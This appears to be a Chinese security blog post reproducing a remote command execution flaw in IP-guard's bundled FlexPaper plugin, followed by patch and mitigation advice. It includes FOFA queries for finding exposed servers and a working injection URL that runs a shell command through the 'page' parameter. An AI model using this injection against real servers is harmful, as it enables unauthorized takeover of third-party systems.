簡介

IP-guard是一款終端安全管理軟件，旨在幫助企業(yè)保護終端設(shè)備安全、數(shù)據(jù)安全、管理網(wǎng)絡(luò)使用和簡化IT系統(tǒng)管理。在舊版本申請審批的文件預(yù)覽功能用到了一個開源的插件 flexpaper，使用的這個插件版本存在遠程命令執(zhí)行漏洞，攻擊者可利用該漏洞執(zhí)行任意命令，獲取服務(wù)器控制權(quán)限。

影響版本：IP-guard<4.81.0307.0

漏洞復(fù)現(xiàn)

FOFA語法：
app="IP-guard"
或者
web.title="IP-guard"

訪問頁面如下所示：

POC：

/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+test+>test.txt

拼接URL進行g(shù)et請求：

http://ip:port/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+test+>test.txt

從瀏覽器訪問后會直接下載一個文件證明請求成功

訪問POC：/ipg/static/appr/lib/flexpaper/php/test.txt

成功執(zhí)行寫入的命令

攻擊者可以利用漏洞獲取對服務(wù)器的控制權(quán)

修復(fù)建議

1、產(chǎn)品升級方案
官方已發(fā)布新版本修復(fù)漏洞，建議盡快訪問官網(wǎng)（https://www.ip-guard.net/）或聯(lián)系官方售后支持獲取版本升級安裝包或補丁，升級至4.81.0307.0及以上。
2、臨時緩解措施

1. 配置入侵檢測系統(tǒng)（IDS）和入侵防御系統(tǒng)（IPS）以及Web應(yīng)用防火墻（WAF），以識別和阻止這類特征的請求，從而保護系統(tǒng)免受此類遠程命令執(zhí)行攻擊的影響；同時為了避免攻擊者繞過安全設(shè)備實施攻擊，建議盡快修復(fù)漏洞。
2. 如非必要，不要將 IP-guard 放置在公網(wǎng)上?；蛲ㄟ^網(wǎng)絡(luò)ACL策略限制訪問來源，例如只允許來自特定IP地址或地址段的訪問請求。

免責(zé)聲明

文章僅做經(jīng)驗分享用途，切勿當(dāng)真，未授權(quán)的攻擊屬于非法行為！利用本文章所提供的信息而造成的任何直接或者間接的后果及損失，均由使用者本人負責(zé)，作者不為此承擔(dān)任何責(zé)任，一旦造成后果請自行承擔(dān)！！！

---

結(jié)語

沒有人規(guī)定，一朵花一定要成長為向日葵或者玫瑰。